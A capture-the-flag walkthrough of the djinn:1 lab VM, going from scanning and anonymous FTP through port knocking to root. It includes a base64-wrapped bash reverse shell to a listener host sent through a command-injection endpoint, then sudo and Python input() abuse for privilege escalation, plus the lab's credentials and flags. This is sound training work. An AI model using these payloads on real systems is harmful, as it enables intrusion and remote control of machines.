- djinn:1 is the next machine I want to break in.
- Level: Beginner-Intermediate
- flags: user.txt and root.txt
- Format: Virtual Machine (Virtualbox - OVA)
- Operating System: Linux
The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You’ll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.
Recon
Djinn shows its actual IP address on the login prompt, so there is no need to run nmap -sn
or netdiscover
.
nmap -A 192.168.14.106
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-30 15:32 EST
Nmap scan report for 192.168.14.106
Host is up (0.00078s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.14.107
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
MAC Address: 08:00:27:53:CE:19 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.78 ms 192.168.14.106
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.51 seconds
FTP Anonymous login allowed
SSH is filtered
Not a lot, so let’s try all ports.
root@kali:~# nmap -A -p- 192.168.14.106
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-30 15:43 EST
Nmap scan report for 192.168.14.106
Host is up (0.00066s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.14.107
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
| '-', 8)
| RPCCheck:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
|_ '*', 6)
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.80%I=7%D=12/30%Time=5E0A619F%P=x86_64-pc-linux-gnu%r(N
SF:ULL,1BC,"\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__
SF:\x20_\x20_\x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x2
SF:0__\x20___\x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_
SF:\x20`\x20_\x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\
SF:x20`\x20_\x20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|
SF:\x20\|\x20\|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20
SF:\|\x20\|\x20\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|
SF:\x20\|_\|\\___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n\nLet's\x20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20math
SF:s\nAnswer\x20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x2
SF:0you\x20your\x20gift\.\n\(3,\x20'-',\x208\)\n>\x20")%r(RPCCheck,1BC,"\x
SF:20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x20_\x20_\
SF:x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20__\x20___\
SF:x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x20`\x20_\
SF:x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x
SF:20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x20\|\x20\
SF:|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\x2
SF:0\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x20\|_\|\\
SF:___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\nLet's\x
SF:20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\nAnswer\x
SF:20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20you\x20you
SF:r\x20gift\.\n\(7,\x20'\*',\x206\)\n>\x20");
MAC Address: 08:00:27:53:CE:19 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.66 ms 192.168.14.106
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.76 seconds
That looks more interesting. So let’s start from the top.
FTP
ftp 192.168.14.106
Connected to 192.168.14.106.
220 (vsFTPd 3.0.3)
Name (192.168.14.106:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt
226 Directory send OK.
ftp> get creds.txt
local: creds.txt remote: creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for creds.txt (11 bytes).
226 Transfer complete.
11 bytes received in 0.02 secs (0.6338 kB/s)
ftp> get game.txt
local: game.txt remote: game.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.txt (128 bytes).
226 Transfer complete.
128 bytes received in 0.02 secs (7.6252 kB/s)
ftp> get message.txt
local: message.txt remote: message.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for message.txt (113 bytes).
226 Transfer complete.
113 bytes received in 0.02 secs (7.1573 kB/s)
Connect as user
anonymous
no password
Files content
I replace cat
with bat . I like the output and so I create an alias in the .bashrc
alias cat='bat'
root@kali:~/djinn# cat creds.txt
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────
│ File: creds.txt
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────
1 │ nitu:81299
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────
root@kali:~/djinn# cat game.txt
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────
│ File: game.txt
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────
1 │ oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
2 │ final level and get the prize.
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────
root@kali:~/djinn# cat message.txt
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────
│ File: message.txt
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────
1 │ @nitish81299 I am going on holidays for few days, please take care of all the work.
2 │ And don't mess up anything.
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────
Port 1337
Opening with netcat:
nc 192.168.14.106 1337
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(3, '*', 1)
>
So we get a math equation to solve here and the message says we need to solve 1000 of them.
Solve with pwntools
A good way to solve such network games is using Python and pwntools .
Install pwntools
with Python 3 (I use Kali Linux 2019.4):
Installing pwntools
directly with pip3
ran into an error. The master-branch does not fully support Python 3.
apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade git+https://github.com/Gallopsled/pwntools.git@dev3
Solution
mathsolve.py
#!/usr/bin/env python3
from pwn import *
c = remote('192.168.14.106',1337)
c.recvuntil("\n\n", drop=True)
# Loop 1000 times
for i in range(1001):
# read from ( to ,
c.recvuntil("(", drop=True)
int1 = c.recvuntil(",", drop=True)
# read from ' to ,
c.recvuntil("'", drop=True)
mathsym = c.recvuntil("'", drop=True)
# read from , to )
c.recvuntil(", ", drop=True)
int2 = c.recvuntil(")", drop=True)
# calculate equation
equation = int1+mathsym+int2
print(str(i)+"th answer= "+str(equation))
# send answer
c.sendlineafter('>',equation)
c.interactive()
➜ chmod +x mathsolve.py
➜ ./mathsolve.py
...
999th answer= b'1+6'
1000th answer= b'6*8'
[*] Switching to interactive mode
Here is your gift, I hope you know what to do with it:
1356, 6784, 3409
[*] Got EOF while reading in interactive
Looks like a sequence to port knocking.
SSH
Check ssh
port
➜ nmap -p22 192.168.14.106
PORT STATE SERVICE
22/tcp filtered ssh
MAC Address: 08:00:27:AD:EB:9A (Oracle VirtualBox virtual NIC)
Install knockd
➜ apt install knockd
Try to open the ssh port
➜ knock 192.168.14.106 1356 6784 3409
Check ssh
port again
➜ nmap -p22 192.168.14.106
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 08:00:27:AD:EB:9A (Oracle VirtualBox virtual NIC)
So the port is open. I tried to connect with the credentials found on the anonymous ftp login, but wasn’t successful. Damn lot of fun, but still not able to connect.
➜ hydra -C creds.txt -u 192.168.14.106 ssh
[DATA] max 1 task per 1 server, overall 1 task, 1 login try, ~1 try per task
[DATA] attacking ssh://192.168.14.106:22/
1 of 1 target completed, 0 valid passwords found
I tried several combinations, with user nitish
like mentioned in the message.txt
. Loaded a larger wordlist for passwords, but wasn’t successful.
Port 7331
Accessing http://192.168.14.106:7331 opens a web page. Let’s digg into that.
gobuster
➜ gobuster dir -w /usr/share/wordlists/dirbuster/directories.jbrofuzz -u http://192.168.14.106:7331
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.14.106:7331
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directories.jbrofuzz
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/12/31 08:18:56 Starting gobuster
===============================================================
[ERROR] 2019/12/31 08:18:56 [!] parse http://192.168.14.106:7331/%: invalid URL escape "%"
/?? (Status: 200)
/genie (Status: 200)
/wish (Status: 200)
===============================================================
2019/12/31 08:20:22 Finished
With /wish
we can execute commands on the webserver and get some response in the black background of the image of /genie
.
To see it little bit easier, I copied the request as cUrl
command from browser devtools:
➜ curl -L 'http://192.168.14.106:7331/wish' \
-H 'User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
--compressed -H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: http://192.168.14.106:7331' -H 'DNT: 1' -H 'Connection: keep-alive' \
-H 'Referer: http://192.168.14.106:7331/wish' -H 'Upgrade-Insecure-Requests: 1' \
-H 'Pragma: no-cache' -H 'Cache-Control: no-cache' \
--data "cmd=ls"
...
<p> app.py
app.pyc
static
templates
</p>
...
Testing with ls /
and some other commands, end with:
<p> Wrong choice of words </p>
I tried several remote shell commands here, but wasn’t successful. Raj Chandel’s Blog gave me the idea to do a base64 conversion of the remote shell.
Solving it on the commandline without a webservice is possible with curl and some commandlinefu:
➜ curl 'http://192.168.14.106:7331/wish' \
-H 'User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.7,de;q=0.3' --compressed \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: http://192.168.14.106:7331' \
-H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://192.168.14.106:7331/wish' \
-H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' \
--data-urlencode \
"cmd=echo $(echo 'bash -i >& /dev/tcp/192.168.14.107/8080 0>&1' | base64) | base64 -d | bash"
- use
--data-urlencode
instead of--data
Raj takes the remote shell command bash -i >& /dev/tcp/192.168.14.107/8080 0>&1
and encode it through https://www.base64encode.org/ , but we can get the same result with
Commandline base64 encode
echo 'bash -i >& /dev/tcp/192.168.14.107/8080 0>&1' | base64
Now let’s connect this on the console. $()
runs the command in parantheses first, so this adds the base64 encoded string,
echo $(echo 'bash -i >& /dev/tcp/192.168.14.107/8080 0>&1' | base64) | base64 -d | bash
is the same as:
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0LjEwNy84MDgwIDA+JjEK | base64 -d | bash
but we can easier change IP or port. Switching the curl
option from --data
to --data-urlencode
converts the command into echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0LjEwNy84MDgwIDA%2BJjEK%20%7C%20base64%20-d%20%7C%20bash
.
Before running our curl
command start the netcat
listener:
nc -nlvp 8080
listening on [any] 8080 ...
When we now run the curl command, we get a shell in netcat
.
Remote shell
nc -nlvp 8080
listening on [any] 8080 ...
connect to [192.168.14.107] from (UNKNOWN) [192.168.14.106] 44802
bash: cannot set terminal process group (740): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@djinn:/opt/80$ ls
ls
app.py app.pyc static templates
www-data@djinn:/opt/80$ cat app.py | grep CREDS
cat app.py | grep nit
CREDS = "/home/nitish/.dev/creds.txt"
www-data@djinn:/opt/80$ cd /home/nitish/.dev
cd /home/nitish/.dev
www-data@djinn:/home/nitish/.dev$ ls
ls
creds.txt
www-data@djinn:/home/nitish/.dev$ cat creds.txt
cat creds.txt
nitish:p4ssw0rdStr3r0n9
Get user.txt
flag
www-data@djinn:/home/nitish/.dev$ su - nitish
su - nitish
Password: p4ssw0rdStr3r0n9
nitish@djinn:~$ ls
ls
user.txt
nitish@djinn:~$ cat user.txt
cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
nitish@djinn:~$ sudo -l
sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
First flag
user.txt
nitish
is allowed to run/usr/bin/genie
withsudo
without password
The shell
is still not that good, we can use ssh
with user nitish and the password above to successfully login. So we get a more stable shell.
Get root flag
ls -al /usr/bin/genie
-rwsr-x--- 1 sam nitish 72000 Nov 11 19:09 genie
nitish@djinn:~$ genie -e id test
genie -e id test
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)
nitish@djinn:~$ sudo -u sam genie -e id test
sudo -u sam genie -e id test
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
Check commands like ls /home/sam
or bash
ended with You are a noob hacker!!, same for everything with -p
.
man genie
SYNOPSIS
genie [-h] [-g] [-p SHELL] [-e EXEC] wish
DESCRIPTION
genie would complete all your wishes, even the naughty ones.
We all dream of getting those crazy privelege escalations, this will
even help you acheive that.
OPTIONS
wish
This is the wish you want to make .
-g, --god
Sometime we all would like to make a wish to god, this option
let you make wish directly to God;
Though genie can't gurantee you that your wish will be heard by
God, he's a busy man you know;
-p, --shell
Well who doesn't love those. You can get shell. Ex: -p "/bin/sh"
-e, --exec
Execute command on someone else computer is just too damn fun,
but this comes with some restrictions.
-cmd
You know sometime all you new is a damn CMD, windows I love you.
SEE ALSO
mzfr.github.io
BUGS
There are shit loads of bug in this program, it's all about finding
First of all, you have to add a wish at the end of the command, but the wish mustn’t be wish
, or you will get an answer like Pass your wish to GOD, he might be able to help you.
We’re user sam
now
$ whoami
whoami
sam
Check sudoers
nitish@djinn:~$ sudo -u sam genie -cmd man
sudo -u sam genie -cmd man
my man!!
$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
Now we need to run /root/lago
We get four choices.
What do you want to do ?
1 - Be naughtys
2 - Guess the numbers
3 - Read some damn filess
4 - Works
Enter your choice:
I ran a grep -ir naughtys .*
as user sam
and got .pyc
as hit. pyc
is compiled python code, so maybe we find something about the lago command.
Double check with string .pyc
shows lots of strings from /root/lago
.
So running http server and download to Kali:
On djinn vm
python3 -m http.server
On Kali
curl -O http://192.168.14.106:8000/.pyc
pip3 install uncompyle6
uncompyle6 .pyc
...
def guessit():
num = randint(1, 101)
print 'Choose a number between 1 to 100: '
s = input('Enter your number: ')
if s == num:
system('/bin/sh')
else:
print 'Better Luck next time'
...
- if input == num start a shell
sam@djinn:/home/sam$ sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
Choose a number between 1 to 100:
Enter your number: num
# whoami
root
# bash
root@djinn:/home/sam#
- Use the variable name directly and we got a new shell as
root
root.flag
cd root
./proof.sh
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________
Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Tue Dec 31 23:18:56 IST 2019
Whoami: root
__________________________________________________________________________
By @0xmzfr
Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)
Links
Here can you find other walkthroughs for this VM (they’re describing other routes and details):